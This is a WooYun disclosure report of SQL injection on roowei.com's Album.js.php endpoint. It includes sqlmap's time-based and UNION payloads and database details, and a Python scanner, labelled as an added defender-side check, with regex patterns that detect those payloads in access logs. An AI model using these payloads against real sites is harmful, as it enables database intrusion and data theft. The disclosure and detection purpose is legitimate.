
Defect ID: wooyun-2016-0178678

Title: SQL injection on the Roowei (入围网) main site, exploitable via UNION

Vendor: roowei.com

Author: 路人甲

Submitted: 2016-02-26 12:12

Fix deadline: 2016-03-02 12:20

Disclosed: 2016-03-02 12:20

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 16

Status: vendor was notified of the vulnerability but chose to ignore it

Source: http://www.wooyun.org (questions or help: [email protected])



Vulnerability details

Disclosure status:

2016-02-26: Details sent to the vendor, awaiting vendor handling
2016-03-02: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Detailed description:

http://www.roowei.com/js/Album.js.php?action=Select_album&class=0&diqu=0&limit=7

[Screenshot: 5.png]

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: class (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: action=Select_album&class=0) AND (SELECT * FROM (SELECT(SLEEP(5)))SVlA) AND (9229=9229&diqu=0&limit=7
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: action=Select_album&class=0) UNION ALL SELECT NULL,CONCAT(0x716b767a71,0x45666263565575454c75,0x7178716271),NULL,NULL,NULL-- &diqu=0&limit=7
---
web application technology: PHP 5.5.14
back-end DBMS: MySQL >= 5.0.0
Database: roowei
[379 tables]
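As a defender-side check added here (it is not part of the original report), the following Python flags web requests carrying the two injection shapes sqlmap reported against the class parameter of Album.js.php, a SLEEP() time-based probe and a UNION ALL SELECT column probe, by decoding each query parameter before matching. The access-log format, client IP and timestamps in the sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Indicators derived from the two sqlmap payloads quoted in the report above
# (time-based blind via SLEEP(), and a UNION ALL SELECT NULL,... column probe).
# Each pattern runs against the URL-decoded value of one query parameter, so
# percent-encoded spaces or '+' in the raw request line do not hide the keywords.
INDICATORS = {
    "time-based blind": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    "union query": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "boolean tail": re.compile(r"\)\s*AND\s*\(\s*\d+\s*=\s*\d+", re.I),
}

# Request line inside an Apache/nginx combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')

def scan_request(target):
    """Return (parameter, indicator) pairs for one request target (path + query)."""
    hits = []
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for name, values in params.items():
        for value in values:
            # parse_qs already decoded once; decode again to catch double-encoding.
            decoded = unquote_plus(value)
            for label, pattern in INDICATORS.items():
                if pattern.search(decoded):
                    hits.append((name, label))
    return hits

def scan_access_log(lines):
    """Return one finding per (line, parameter, indicator) over raw log lines."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m:
            for param, label in scan_request(m.group("target")):
                findings.append({"param": param, "indicator": label, "line": line})
    return findings

# Constructed sample log lines: the report's endpoint with a normal request
# followed by its two sqlmap payloads as they would appear percent-encoded.
SAMPLE_LOG = [
    '203.0.113.9 - - [26/Feb/2016:12:00:01 +0800] "GET /js/Album.js.php?action=Select_album&class=0&diqu=0&limit=7 HTTP/1.1" 200 812',
    '203.0.113.9 - - [26/Feb/2016:12:00:02 +0800] "GET /js/Album.js.php?action=Select_album&class=0)%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))SVlA)%20AND%20(9229=9229&diqu=0&limit=7 HTTP/1.1" 200 812',
    '203.0.113.9 - - [26/Feb/2016:12:00:08 +0800] "GET /js/Album.js.php?action=Select_album&class=0)%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x716b767a71,0x45666263565575454c75,0x7178716271),NULL,NULL,NULL--%20&diqu=0&limit=7 HTTP/1.1" 200 944',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['indicator']:>16} in parameter '{f['param']}'")
```

The benign first line produces no finding; the two payload lines are attributed to the class parameter, which is where the report places the injection.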

Proof of vulnerability:

Remediation:

Copyright notice: please credit 路人甲@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2016-03-02 12:20

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None yet